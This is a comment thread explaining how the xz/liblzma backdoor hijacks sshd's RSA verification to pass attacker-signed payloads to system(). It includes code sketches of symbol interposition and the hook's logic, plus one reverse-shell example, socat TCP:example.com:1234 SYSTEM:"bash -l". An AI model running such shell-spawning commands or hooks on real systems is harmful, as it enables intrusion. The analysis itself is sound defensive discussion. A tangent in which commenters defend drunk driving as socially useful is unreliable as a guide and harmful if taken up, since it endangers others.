Because it makes things less secure. If it was sufficient to send the hash to the server to authenticate, and the server simply compares the hash sent by the user with the hash in its database, then the hash is actually the password. An attacker doesn't need to know the password anymore, as the hash is sufficient.
Hashing was introduced precisely because some vulnerabilities allow read access to the database. With hashed passwords, the attacker in such a situation has to perform a password guessing attack first to proceed. If it was sufficient to send the hash for authentication, the attacker would not need to guess anything.
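A sketch of what the server side does with the submitted password (glibc crypt(), link with -lcrypt; a real service should prefer bcrypt/scrypt/argon2 and a constant-time compare):

    #include <crypt.h>
    #include <string.h>

    /* stored_hash was produced at signup by crypt(password, "$6$<random salt>")
     * and embeds its own salt, so it doubles as the salt argument here. */
    int check_password(const char *submitted, const char *stored_hash)
    {
        const char *h = crypt(submitted, stored_hash);

        /* The database only ever holds the salted hash; the cleartext password
         * exists in memory just for the duration of this check. */
        return h != NULL && strcmp(h, stored_hash) == 0;
    }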
To really nitpick the server does have the password during authentication. The alternate would be a PAKE which is currently quite rare. (But probably should become the standard)
I was going more for shouldn’t. You’re right, but for zero knowledge things like password managers where they specifically do not want your password.
> You never submit your password, you submit that hash and they compare it.
That's not true. If that were the case, the hash is now the password and the server stores it in clear text. It defeats the entire purpose of hashing passwords.
Side note: that is (almost) how NTLM authentication works and why pass-the-hash is a thing in Windows networks.
More an implementation detail than a conceptual distinction, though.
I have often seen the secret component of an asymmetric key pair referred to as a secret key as well. See libsodium for example. Maybe it's because Curve25519/Ed25519 secrets are 32 random bytes, unlike RSA keys, which have a specific structure that makes them distinct from generic secrets.
It also allows "pk" and "sk" as overly short variable names, an argument developers are sometimes tempted by!
Absolutely, it's very convenient when working on a whiteboard :)
Private keys are also “secrets” here in the security world.
“Vault secures, stores, and tightly controls access to tokens, passwords, certificates, API keys, and other secrets in modern computing”
Your distinction is not shared by the industry so it’s not something helpful to correct people on.
I don't think I can take seriously in this context a quote in which certificates (a type of public document) are also designated "secrets".
Like, sure, they're probably thinking of PKCS#12 files which actually have the private key inside them, not just the certificate, but when they are this sloppy of course they're going to use the wrong words.
I understand that we may never see the secret knock, but shouldn't we have the door and what's behind it now? Doesn't this mean that the code is quite literally too hard to figure out for a human being? It's not like he can send a full new executable binary that simply gets executed; then we'd see that the door is, e.g., the exec() call. Honestly this attempt makes me think that the entire C/C++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like OpenSSH, but it's possible because it's written in C/C++.
Can we stop the ridiculous C++ fearmongering? You can make vulnerable software in any language, and you can do social engineering on any software.
The people who are busy inserting backdoors into all the "rewrite it in Rust" projects (where anonymous, never-heard-from-before, new-to-programming randos rewrite long-trusted, high-security projects in Rust) would presumably very much like everyone else's attention directed elsewhere.
The "stuff behind the door" is conveniently uploaded with the secret knock. It's not there and it will never be because it's remotely executed without getting written down. The attacker does send executable code, singed and encrypted (or only one of them? It does not matter) with their private key. The door checks anything incoming for a match with the public key it has and executes when happy.
C++ has nothing to do with this; it's the dynamic linking mechanism that allows trusted code to do the things trusted code is allowed to do (talking about the hooking that makes the key check possible, not about the execution that comes after - that is even more mundane, code can execute code, it's a von Neumann architecture after all).
It's not too hard to figure out. People are figuring it out. If anything is too hard, it's due to obfuscation - not C/C++ shenanigans. As far as I understand from scrolling through these comments, an attacker can send a command that is used with the system() libc call. So the attacker basically has a root shell.
This is literally what the top post link is about. The backdoor functionality has been (roughly) figured out: after decryption and signature verification it passes the payload received in the signing key of the client's authentication certificate to system().
C/C++ is not a problem here because sshd has to run things to open sessions for users.
The payload is simply remote code execution. But we'll never know the secret knock that triggers it, and we can't probe existing servers for the flaw because we don't know the secret knock.
I imagine that we could in short order build ourselves a modified version of the malware, which contains a different secret knock, one that we know in advance, and then test what would have happened with the malware when the secret knock was given. But this still doesn't help us probe existing servers for the flaw, because those servers aren't running our modified version of the malware, they're running the original malware.
All analogies are flawed, and we are rapidly approaching the point of madness.
Still, let me try. In this case, someone on the inside of the building looked in a dusty closet and saw a strange pair of hinges on the wall of the closet. Turns out that the wall of the closet is an exterior wall adjoining the alley back behind the building! At least they know which contractor built this part of the building.
Further examination revealed the locking mechanism that keeps the secret door closed until the correct knock is used. But because the lock is based on the deep mathematics of prime numbers, no mere examination of the lock will reveal the pattern of knocks that will open it. The best you could do is sit there and try every possible knocking pattern until the door opens, and that would take the rest of your life, plus the rest of the lifetime of the Earth itself as well.
Incidentally, I could write the same exploit in rust or any other safe language; no language can protect against a malicious programmer.
As for detecting use of the back door, that's not entirely out of the question. However it sounds like it would not be as easy as logging every program that sshd calls exec on. But the audit subsystem should notice and record the activity for later use in your post-mortem investigation.
> Honestly this attempt makes me think that the entire C/C++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like OpenSSH, but it's possible because it's written in C/C++.
Nothing about this relies on a memory safety exploit. It's hard to figure out because it's a prebuilt binary and it's clever. Unless you meant "all compiled languages" and not C/C++ specifically, it's irrelevant.
The right thing to argue against based on your instinct (no one can figure out what is going on) is: it should be unacceptable for there to be prebuilt binaries committed to the source code.
Nothing here is something that could not be done in other languages. For example, in Rust, auditing this kind of supply chain attack is even more nightmarish if the project uses crates, as crates are often very small, causing the "npm effect".
Another good example is Docker images. The way people often build Docker images is not that they are built all the way from the bottom. The bottom layer(s) is/are often some arbitrary image from an arbitrary source, which creates a huge supply chain attack risk.
I could be wrong, but my understanding is that it isn't even a door. It simply allows anyone that has a certain private key to send a payload that the server will execute. This won't produce any audit of someone logging in, you won't see any session etc.
Any Linux with this installed would basically become a bot that can be taken over. Perhaps they could send a payload to make it DDoS another host, or payload to open a shell or payload that would install another backdoor with more functionality, and to draw attention away from this one.
In a way this is a really responsible backdoor. In the end this is even less dangerous than most unreported 0-days collected by public and private actors. Absurdly, I would feel reasonably safe with the compromised versions. Somebody selling botnet hosts would never be so careful to limit collateral damage.
It looks like the exploit path calls system() on attacker supplied input, if the check passes. I don't think we need to go into more detail than "it does whatever the attacker wants to on your computer, as root".
I don't think we know what exactly this does, yet. I can only answer one of those questions; as far as I understand, the "unreplayable" part is referring to this:
Apparently the backdoor reverts back to regular operation if the payload is malformed or *the signature from the attacker's key doesn't verify*.
emphasis mine, note the "signature of the attacker's key". So unless that key is leaked, or someone breaks the RSA algorithm (in which case we have far bigger problems), it's impossible for someone else (researcher or third-party) to exploit this backdoor.
This feels very targeted
Or very untargeted. Something intended just to lie dormant by chance if it succeeded...
It is a very good backdoor to have if, at whatever time, you have dozens of options. See sshd running, test this; you are done if it works, and if not, move on to something else.
Or targeted not really at doing anything but at researching the nature of supply chain vulnerabilities themselves.
This doesn't look like research.
This looks like a state-sponsored attack. Imagine having a backdoor where you can just go to any Linux server and, with your key, make it execute any code you wish without any audit trail. And no one without the key can do it, so even if your citizens use such a vulnerable system, other states won't be able to use your backdoor.
Spending two years actually maintaining an open source project that you will later backdoor is a very expensive way to perform such research.
Untargeted (backdoor goes almost everywhere), but very selective (backdoor can only be triggered by the original attacker).
> So unless that key is leaked
But, just for replayability, we could "patch" the exploit with a known key and see what it does, couldn't we?
Replayability means something different in this context. First, we do know the backdoor will pass the payload to system, so in general it is like an attacker has access to bash, presumably as root since it is sshd.
Replayability means, if someone were to catch a payload in action which did use the exploit, you can’t resend the attacker’s data and have it work. It might contain something like a date or other data specific only to the context it came from. This makes a recorded attack less helpful for developing a test… since you can’t replay it.
> It might contain something like a date or other data specific only to the context it came from.
In all these modern protocols, including SSHv2 / SecSH (Sean Connery fans at the IETF evidently) both parties deliberately introduce random elements into a signed conversation as a liveness check - precisely to prevent replaying previous communications.
TLS 1.3's zero round-trip (0-RTT) mode cannot do this, which is why it basically says you'd better be damn sure you've figured out exactly why it's safe to use this, including every weird replay scenario and why it's technically sound in your design, or else you must not enable it. We may yet regret the whole thing and just tell everybody to refuse it.
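A sketch of that liveness idea (libsodium, Ed25519, invented message layout): the signature has to cover a random challenge from this session, so a captured exchange verifies nowhere else.

    #include <sodium.h>
    #include <string.h>

    #define NONCE_LEN 32
    #define MAX_MSG   1024

    /* Accept msg only if sig covers (session_nonce || msg) under pk. An old,
     * captured exchange was signed over a different nonce and fails here. */
    int verify_live(const unsigned char *pk,
                    const unsigned char session_nonce[NONCE_LEN],
                    const unsigned char *msg, size_t msg_len,
                    const unsigned char sig[crypto_sign_BYTES])
    {
        unsigned char buf[NONCE_LEN + MAX_MSG];

        if (msg_len > MAX_MSG || sodium_init() < 0)
            return 0;

        memcpy(buf, session_nonce, NONCE_LEN);
        memcpy(buf + NONCE_LEN, msg, msg_len);
        return crypto_sign_verify_detached(sig, buf, NONCE_LEN + msg_len, pk) == 0;
    }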
What could be done, I think, is patch the exploit into logging the payload (and perhaps some network state?) instead of executing it to be able to analyse it. Analyse it, in the unlikely case that the owner of the key would still try their luck using it after discovery, on a patched system.
What it does: it's full RCE, remote code execution, it does whatever the attacker decides to upload. No mystery there.
> see what it does
it does whatever the decrypted/signed payload tells the backdoor to execute - it's sent along with the key.
The backdoor is just that - a backdoor to let in that payload (which will have come from the attacker in the future when they're ready to use this backdoor).
It would be really cool if in 20 years when we have quantum computers powerful enough we could see what this exploit does.
My understanding is that we know somehow already what the exploit allows the attacker to do - we just can't reproduce it because we don't have their private key.
Technically, we can modify the backdoor and embed our own public key - but there is no way to probe a random server on the internet and check if it's vulnerable (from a scanner perspective).
In a certain way it's a good thing - only the creator of the backdoor can access your vulnerable system...
It's a NOBUS (Nobody But Us can use it) attack. The choice to use a private key means it's possible that even the person who submitted the tampered code doesn't have the private key, only some other entity controlling them does.
AFAIK still no luck with Gauss from 2012
We do know what it does. If it decrypts, it just passes it to system().
I don't understand yet where the "unreplayable" part comes from, but this isn't it.
Replayable: You observe attack against server A, you can take that attack and perform it against server B.
This attack is unreplayable because it cryptographically ties into the SSH host key of the server.
I know what replayable means. But even with your explanation of what makes it unreplayable it's not strictly true: you could replay the attack on the server it was originally played against.
Sure. But the interest is in being able to talk to server B to figure out if it's vulnerable; that's impossible, because the attack can't be replayed to it.
It's not using RSA. It's hooking RSA. And the attacker's signature is Ed448, not RSA.
That's the most interesting part. No, we don't know it yet. The backdoor is so sophisticated that none of us can fully understand it. It is not a “usual” security bug.
Yeah, these types of security issues will be used by politicians to force hardware makers to lock down hardware and embed software in chips.
The go-fast startups' habit of “import the world to make my company products” is a huge security issue IT workers ignore.
The only solution politics and big tech will chase is to obsolete said job market by pulling more of the stack into locked-down hardware, with updates only allowed to come from the gadget vendor.
The NSA demands that Intel and AMD provide backdoor ways to turn off the IME/PSP, which are basically a small OS running in a small processor inside your processor. So the precedent is that the government wants less embedded software in their hardware, at least for themselves.
If we relied on gadget vendors to maintain such software, I think we can just look at any IoT or router manufacturer to get an idea of just how often and for how long they will update the software. So that idea will probably backfire spectacularly if implemented.
What does the IME or PSP do?
Short answer: anything it wants.
IME has privileged access to the MMU(s), all system memory, and even out-of-band access to the network adapter such that the OS cannot inspect network traffic originating with or destined for the IME.
Lots. It's basically an extra processor that runs at all times, even when your computer is supposedly "off." Its firmware is bigger than you'd think, like a complete Unix system big. It's frankly terrifying how powerful and opaque it is. It provides a lot around remote management for corporations, lots of "update the BIOS remotely" sort of features, and also a bunch of those stupid copy protection enforcement things. Plus some startup/shutdown stuff like Secure Boot.
I'm not saying political forces won't try legislating the problem away, but that won't even help here.
A supply chain attack can happen in hardware or software. Hardware has firmware, which is software.
What makes this XZ attack so scary is that it was directly from a "trusted" source. A similar attack could come from any trusted source.
At least with software it is much easier to patch.
Like you said, it has firmware which is flashable. Secure enclaves are never 100% secure, but if only, for example, Apple can upload to them, it dramatically reduces the risk of some random open source project being git-pulled in. Apple may still pull in open source, but they would be on the hook to avoid this.
Open source's days of declaring “use at your own risk” have become a liability in this hyper-networked society. It's now becoming part of the problem it was imagined up to solve.
Why would "embed software in chips" be a solution?
If anything, I'd expect it to be an even bigger risk, because when (not if) a security issue is found in the hardware, you now have no way to fix it, other than throwing out this server/fridge/toothbrush or whatever is running it.
A flashable secure enclave segment in the hardware stack is an option to patch around embedded bugs.
I haven’t worked in hardware design since the era of Nortel, and it was way different back then but the general physics are the same; if, else, while, and math operations in the hardware are not hard.
In fact your hardware is a general while loop; while it has power, iterate around refreshing these memory states with these computed values, even in the absence of user input (which at the root is turning it on).
Programmers have grown accustomed to being necessary to running ignorant business machines but that’s never been a real requirement. Just a socialized one. And such memes are dying off.
Which will make updates either expensive or impossible. You will be able to write books about exploitable bugs in the hardware, and those books will easily survive several editions.
It’s not that we can’t understand it, it’s just that work to understand it is ongoing.
What makes you say that? I haven't started reverse engineering it myself, but from all I have read, people who did have a very good understanding of what it does. They just can't use it themselves, because they would need to have the attacker's private key.
From what I’ve read I think the attack vector is:
1. sshd starts and loads the libsystemd library which loads the XZ library which contains the hack
2. The XZ library injects its own versions of functions in openssl that verify RSA signatures
3. When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
4. The certificate, in turn, can contain arbitrary data that in a normal login process would include assertions about username or role that would be used to determine if the certificate is valid for use logging in as the particular user. But if the hacked functions detect that the certificate was signed by a specific attacker key, they take some subfield of the certificate and execute it as a command on the system in the sshd context (ie, as the root user).
Unfortunately, we don’t know the attacker’s signing key, just the public key the hacked code uses to validate it. But basically this would give the attacker a way to run any command as root on any compromised system without leaving much of a trace, beyond the (presumably failed) login attempt, which any system on the internet will be getting a lot of anyway.
beyond the (presumably failed) login attempt
There is some evidence it's scrubbing logs so we might not even have that.
Is there really a failed login attempt? If it never calls the real functions of ssh in the case of their own cert+payload, why would sshd log anything or even register a login attempt? Or does the backdoor function hook in after sshd has already logged stuff?
I think it would depend on logging level, yeah. I’ve not seen one way or another whether it aborts the login process or prevents logging, but that’s possible, and would obviously be a good idea. Then the question would be if you could detect the difference between a vulnerability-aborted login attempt and just a malformed/interrupted login attempt.
But in the case of this specific attack, probably the safest approach would be to watch and track what processes are being spawned by sshd. Which in retrospect is probably advisable for any network daemon. (Of course, lots of them will be sloppy and messy with how they interact with the system and it might be next to impossible to tell attacks from “legit” behavior. But sshd is probably easier to pin down to what’s “safe” or not.)
Depending on log level, aren't there going to be log lines up to the point of receiving the payload?
When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
So if I only use pubkey auth and ED25519, there's no risk?
Besides this, just to understand it better: if someone tries to log in to your server with the attacker's certificate, the backdoor will disable any checks for it and allow the remote user to log in as root (or any other arbitrary user), even if root login is disabled in the sshd config?
I don’t think we know enough to be sure even disabling certificate auth would prevent this. But from what I can tell it probably wouldn’t directly allow arbitrary user login. It only seems to allow the execution of an arbitrary command. But of course that command might do something that would break any other security on the system.
But, one clever thing about this attack is that the commands being run wouldn’t be caught by typical user-login tracking, since there’s no “login”. The attacker is just tricking sshd into running a command.
So is the implication here that any system that allows SSH and contains this malicious code is vulnerable?
Siblings saying "we don't know" haven't really grokked the post, I don't think.
If I'm understanding the thread correctly, here's a (not so) succinct explanation. Please, if you know better than I do, correct me if I've made an error in my understanding.
`system()` is a standard C function that takes a string as input and runs it through `sh`, like so:
sh -c "whatever input"
It's used as a super rudimentary way to run arbitrary shell commands from a C program, using the `execl()` call under the hood, just like you'd run them on a bash/sh/fish/zsh/whatever command line:
    system("echo '!dlroW ,olleH' | rev");
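A tiny, self-contained demo of the pattern (stock libc behavior, nothing backdoor-specific; the command is just an example):
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        /* libc hands the string to /bin/sh -c "..." in a child process. */
        printf("caller uid: %d\n", (int)getuid());

        /* `id -u` prints the same uid: the child shell runs with the
           caller's credentials. Run this binary as root and the command
           runs as root as well. */
        return system("id -u");
    }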
Those commands run mostly in the same privilege context as the process that invoked `system()`. If the call to `system()` came from a program running as root, the executed command is also run as root.
The backdoor utilizes this function in the code that gets injected into `sshd` by way of liblzma.so, a library for the LZMA compression algorithm (commonly associated with the `.xz` extension). Jia Tan, the person at the center of this whole back door, has been a maintainer of that project for several years now.
Without going too much into how the injected code gets into the `sshd` process, the back door inserts itself into the symbol lookup process earlier than other libraries, such as libcrypto (OpenSSL). What this means is (and I'm over-simplifying a lot), when the process needs to map usages of e.g. `SSL_decrypt_key()` that were linked to dynamic libraries (as opposed to being statically linked and thus included directly into `sshd`) to real functions, it does a string-wise lookup to see where it can find it.
It runs through a list of dynamic libraries that might have it and sees if they export it. If they do, it gets the address of the exported function and remembers where it's at so that further calls to that function can be found quickly, without another search. This is how DLLs and SOs (dynamic libraries) are linked to the process that needs them at runtime without the process needing to know exactly where the functions that they need are located.
The back door hijacks this mechanism to insert its own functions in some of those places, so that when `sshd` thinks it's calling `SSL_decrypt_key()`, it's really calling some malicious function in the back door - which can then choose to do something with the data passed to the function call, or it can choose to forward the call to the real function.
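To get a feel for that general "intercept or forward" pattern (and only the pattern: the backdoor does not use LD_PRELOAD, it tampers with symbol resolution while the libraries are being loaded), here is a minimal, hypothetical shim that interposes an ordinary libc function and then passes the call through to the real implementation:
    /* shim.c -- build with: gcc -shared -fPIC shim.c -o shim.so -ldl
       Inject with: LD_PRELOAD=./shim.so some_program
       Purely illustrative; not how the xz backdoor installs its hooks. */
    #define _GNU_SOURCE
    #include <dlfcn.h>
    #include <stdio.h>
    #include <unistd.h>

    uid_t getuid(void)
    {
        /* Look up the "next" getuid after us, i.e. the real libc one. */
        static uid_t (*real_getuid)(void);
        if (!real_getuid)
            real_getuid = (uid_t (*)(void))dlsym(RTLD_NEXT, "getuid");

        /* A malicious shim could lie or act here; we just log and forward. */
        fprintf(stderr, "getuid() intercepted\n");
        return real_getuid();
    }
Every call the program makes to `getuid()` now lands in the shim first, which is exactly the position the back door wants to occupy for the verification routines it cares about.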
It makes use of this when `sshd` needs to validate RSA information passed to the server via a client connection during authentication. An RSA key has a bunch of fields, one of which is the 'n' field - the modulus, which makes up the bulk of the public key data. OpenSSL implements this as a BIGNUM, a variable-length, potentially very large number. It's more or less read in as a bag of bytes, and its meaning depends on the underlying encryption algorithm. This is the mechanism behind "public key authentication" when connecting to servers, and is generally more secure than e.g. username/password authentication.
The back door intercepts the call to check the RSA data, pulls out the 'n' parameter, and tries to decrypt it using ChaCha20. There's no way for it to know beforehand whether the data is really encrypted, but generally encryption schemes have a way to error-check and report failures - that, or you add some well-known piece of information into the encrypted data that you can verify once it's decrypted.
Either way, the back door checks to see if it's really an encrypted string. If not, it forwards the call back to the original RSA check mechanism so that sshd can process it normally.
However, if the decryption succeeds, the back door passes the decrypted string to `system()`. This means that a random client connecting to an SSH server can craft an RSA public key that is really an encrypted, malicious payload, and run an arbitrary shell command as whichever user `sshd` is running as - oftentimes root.
Not only that, but the back door also checks the incoming RSA structure to see if it's coming from the person who made it. This prevents any of us from finding this exploit and using it ourselves, even if we know our target is infected. It's a back door completely exclusive to whoever holds the private key used by the back door to sort of 'authenticate' the exploit itself.
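Putting those pieces together, the decision the hooked check makes looks roughly like the sketch below (invented names, crypto stubbed out; the real code is a reverse-engineered binary blob and considerably more involved), so treat it purely as an illustration of the control flow just described:
    /* Conceptual sketch only -- hypothetical names, stubbed crypto. */
    #include <stdlib.h>

    typedef int (*rsa_check_fn)(const unsigned char *n, size_t n_len);

    /* Saved pointer to the genuine OpenSSL routine, captured when the
       hook was installed. */
    static rsa_check_fn real_rsa_check;

    /* Stand-in for "decrypt the blob with ChaCha20 and verify the
       attacker's signature". Succeeds only for payloads built with the
       attacker's private key; everybody else's keys fail here. */
    static int extract_attacker_payload(const unsigned char *n, size_t n_len,
                                        char *cmd, size_t cmd_size)
    {
        (void)n; (void)n_len; (void)cmd; (void)cmd_size;
        return 0; /* placeholder */
    }

    int hooked_rsa_check(const unsigned char *n, size_t n_len)
    {
        char cmd[1024];

        if (extract_attacker_payload(n, n_len, cmd, sizeof cmd)) {
            /* Valid payload: run it with sshd's privileges (often root). */
            system(cmd);
            return 0;
        }

        /* Anything else goes to the real check, so normal logins keep
           working and nothing looks unusual. */
        return real_rsa_check(n, n_len);
    }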
This is much worse than what many of us thought it was before - a public key auth bypass - which would have meant that you'd only gain access as a user allowed to log in via SSH. SSH's configuration has a setting that disables root logins entirely, which is generally enabled on production systems for obvious reasons. However, with this being an RCE, SSH servers running as root would execute the payloads as root.
From there, they could easily run socat and have the system connect to a server of their choice to gain a remote interactive shell, for example:
socat TCP:example.com:1234 SYSTEM:"bash -l"
The possibilities are really endless. They'd effectively have a skeleton key that only they could use (or sell) that, with enough time for people to upgrade their version of `sshd`, would allow them access to just about any SSH server they could connect to, oftentimes with root permissions.
Hope that explains it a bit.
Thank you for the detailed write up. This made me think: why do we actually let sshd run as root? Would it be possible to run only a very unsophisticated SSH server as root that, depending on the user specified in the incoming connection, just hands the connection off to a server running as that user? That could be so simplistic that a backdoor would be more easily detected.
Because it needs to be able to spawn processes as any user.
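Concretely, after authentication the privileged part of the daemon has to do something like the rough sketch below (not OpenSSH's actual code), and setgid()/setuid() to an arbitrary account only succeed for root, which is why the listening daemon itself keeps root:
    #include <pwd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /* After authenticating `username`, drop to that account and start
       its login shell. Only a root process can switch to arbitrary
       uids/gids like this. */
    static void spawn_session(const char *username)
    {
        struct passwd *pw = getpwnam(username);
        if (!pw) {
            fprintf(stderr, "no such user: %s\n", username);
            exit(1);
        }

        if (setgid(pw->pw_gid) != 0 || setuid(pw->pw_uid) != 0) {
            perror("dropping privileges");  /* fails if we aren't root */
            exit(1);
        }

        execl(pw->pw_shell, pw->pw_shell, "-l", (char *)NULL);
        perror("execl");
        exit(1);
    }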
They'd effectively have a skeleton key that only they could use (or sell) that
This looks more like a state-sponsored attack; it doesn't look like someone joining and at some point deciding they want to implement a backdoor.
The guy joined the project two years ago, developed a test framework (which he then used to hide the binary of the backdoor - a binary that appears to be complex, and others are still figuring out how it works), then gradually disabled various security checks before activating it.
Siblings saying "we don't know" haven't really grokked the post, I don't think.
The reason for saying "we don't know" is not that we don't understand what's detailed in TFA, but that the backdoor embeds an 88 kB object file into liblzma, and nobody has fully reverse engineered and understood all that code yet. There might be other things lurking in there.
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Not if public-key cryptography was used correctly, and if there are no exploitable bugs.
We understand it completely. However, since determining the private key that corresponds to the public key embedded in the backdoor is practically infeasible, we can't actually exercise it. Someone could modify the code with a known ed448 private key and exercise it, but the point of having the PoC is to scan the internet and find vulnerable servers.
The attacker wants to be able to send a specially crafted public key to the sshd on their target's server. That crafted key is totally bogus input; a normal sshd would probably just reject it as invalid. The bits embedded in the key are actually malicious code, encrypted/signed with the attacker's secret key.
In order to achieve their objective, they engineered a backdoor into sshd that hooks into the authentication functions which handle those keys. Whenever someone sends a key, it tries to decrypt it with the attacker's keys. If it fails, proceed as usual, it's not a payload. If it successfully decrypts, it's time for the sleeper agent to wake up and pipe that payload into a brand new process running as root.
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available?
The exploit as shipped is a binary (cleverly hidden in the test data), not source. And it validates the payload vs. a private key that isn't known to the public. Only the attacker can exercise the exploit currently, making it impossible to scan for (well, absent second order effects like performance, which is how it was discovered).
As a de facto maintainer of an obscure open source game, I see devs come and go. I just merge all the worthwhile contributions. Some collaborators go pretty deep with their features, with a variety of coding styles, in a mishmash of C and C++. I'm not always across the implementation details, but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed. Lucky the game is so obscure and the attack surface minuscule, but it did stop me from any temptation to sign Windows binaries out of any sense of munificence.
This xz backdoor is just the most massive nightmare, and I really feel for the og devs, and anyone who got sucked in by this.
but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed
That's true of course, but it's not a problem specific to software. In fact, I'm not even sure it's a "problem" in a meaningful sense at all.
When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it. Police aren't around to help you. This horror scenario, much worse than a software backdoor, is actually the minimum viable danger that you need to accept in order to be able to do anything at all. And yes, sometimes it does really happen.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has. The fantasy that if code review was just a little tighter, if more linters, CI mechanisms, and pattern matching were employed, if code signing was more widespread, if we verified people's identities etc., if all these things were implemented, then such scenarios could be prevented, that fantasy is the real problem. It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
https://en.wikipedia.org/wiki/Normalcy_bias ?
It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
What "cure" would you recommend?
You need to accept that everything has a tradeoff and some amount of drama just seems to be built into the system.
Take sex work, for example. Legalizing it leads to an overall increase in sex trafficking. But it also does this: https://www.washingtonpost.com/news/wonk/wp/2014/07/17/when-...
My personal opinion is that if something is going to find a way to conduct itself in secret anyway (at high risk and cost) if it is banned, it is always better to just suck it up and permit it and regulate it in the open instead. Trafficked people are far easier to discover in an open market than a black one. Effects of anything (both positive and negative) are far easier to assess when the thing being assessed is legal.
Should we ban cash because it incentivizes mugging and pickpocketing and theft? (I've been the victim of pickpocketing. The most valuable thing they took was an irreplaceable military ID I carried (I was long since inactive)... Not the $25 in cash in my wallet at the time.) I mean, there would literally be far fewer muggings if no one carried cash. Is it thus the cash's "fault"?
But there have to be specific trade-offs, in each case.
I am reminded of the words of "a wise man."
https://news.ycombinator.com/item?id=39874049
Captain's Log: This entire branch of comments responding to OP is not helping advance humanity in any significant way. I would appreciate my statement of protest being noted by the alien archeologists who find these bits in the wreckage of my species.
I think drunk driving being an oil that keeps society lubricated cannot and should not be understated.
Yes, drunk driving kills people and that's unacceptable. On the other hand, people going out to eat and drink with family, friends, and co-workers after work helps keep society functioning, and the police respect this reality because they don't arrest clearly-drunk patrons coming out of restaurants to drive back home.
This is such a deeply American take that I can't help but laugh out loud. It's like going to a developing nation and saying that, while emissions from two stroke scooters kills people there's no alternative to get your life things done.
It certainly isn't just America, though we're probably certainly the most infamous example.
I was in France for business once in the countryside (southern France), and the host took everyone (me, their employees, etc.) out to lunch. Far as I could tell it was just an everyday thing. Anyway, we drove about an hour to a nearby village and practically partied for a few hours. Wine flowed like a river. Then we drove back and we all got back to our work. So not only were we drunk driving, we were drunk working. Even Americans usually don't drink that hard; the French earned my respect that day, they know how to have a good time.
Also many times in Japan, I would invite a business client/supplier or a friend over for dinner at a sushi bar. It's not unusual for some to drive rather than take the train, and then of course go back home driving after having had lots of beer and sake.
Whether any of us like it or not, drunk driving is an oil that lubricates society.
Even Americans usually don't drink that hard; the French earned my respect that day.
Is drinking hard something so deserving of respect? Is working while impaired?
To me this reads as "I like to fuck off and be irresponsible and man did these French guys show me how it's done!"
Except they weren't irresponsible. We all drove back just fine, and we all went back to work just as competently as before like nothing happened.
It takes skill and maturity to have a good time but not so much that it would impair subsequent duties. The French demonstrated to me they have that down to a much finer degree than most of us have in America, so they have my respect.
This isn't to say Americans are immature, mind you. For every drunk driving incident you hear on the news, hundreds of thousands if not millions of Americans drive home drunk without harming anyone for their entire lives. What I will admit is Americans would still refrain from drinking so much during lunch when we still have a work day left ahead of us, that's something we can take lessons from the French on.
Life is short, so those who can have more happy hours without compromising their duties are the real winners.
As someone who knows people who died in a crash with another drunk driver, it is hard for me to accept your view. Certainly, at a bare minimum, the penalties for drunk driving that results in fatality should be much harsher than they are now -- at that point there is hard empirical evidence that you cannot be trusted to have the "skill and maturity" necessary for driving -- but we can't even bring ourselves to do that, not even for repeat offenders.
Eventually I am optimistic that autonomous driving will solve the problem entirely, at least for those who are responsible drivers. In an era of widely available self-driving cars, if you choose to drive drunk, then that is an active choice, and no amount of "social lubrication" can excuse such degenerate behavior.
I'm certainly not trying to understate the very real and very serious suffering that irresponsible drunk drivers can and do cause. If any of this came off like that then that was never my intention.
When it comes to understanding drunk driving and especially why it is de facto tolerated by society despite its significant problems, it's necessary to consider the motivators and both positive and negative results. Simply saying "they are all irresponsible and should stop" and such with a handwave isn't productive. After all, society wouldn't tolerate a significant problem if there wasn't a significant benefit to doing so.
You can laugh out loud all you want, but there are mandatory parking minimums for bars across the USA.
Yes, bars have parking lots, and a lot of spaces.
The intent is to *drive* there, drink and maybe eat, and leave in some various state of drunkenness. Why else would the spacious parking lots be required?
drunk driving may kill a lot of people, but it also helps a lot of people get to work on time, so, it;s impossible to say if its bad or not,
What is more depressing is how we can acknowledge that reality and continue to do absolutely nothing to mitigate it except punish it, in many cases.
The more people practically need to drive, the more people will drunk drive and kill people, yet in so many cases we just sort of stop there and go "welp, guess that's just nature" instead of building viable alternatives. However, the other theoretical possibility is that if people didn't need to drive, they might end up drinking more.
https://en.wikipedia.org/wiki/Normalcy_bias
Indeed, that "bias" is a vital mechanism that enables societies to function. Good luck getting people to live together if they look at passersby thinking "there is a 0.34% chance that guy is a serial killer".
What "cure" would you recommend?
Accepting that not every problem can, or needs to be, solved. Today's science/tech culture suffers from an almost cartoonish god complex seeking to manage humanity into a glorious data-driven future. That isn't going to happen, and we're better off for it. People will still die in the future, and they will still commit crimes. Tomorrow, I might be the victim, as I already have been in the past. But that doesn't mean I want the insane hyper-control that some of our so-called luminaries are pushing us towards to become reality.
Honestly this is why I think we should pay people for open source projects. It is a tragedy-of-the-commons issue. All of us benefit a lot from this free software, which is produced for free. Pay doesn't exactly fix the problems directly, but it does decrease the risk. Pay means people can work on these full time instead of on the side. Pay means it is harder to bribe someone. Pay also makes the people contributing feel better, like their work is meaningful. Importantly, pay signals to these people that we care about them.
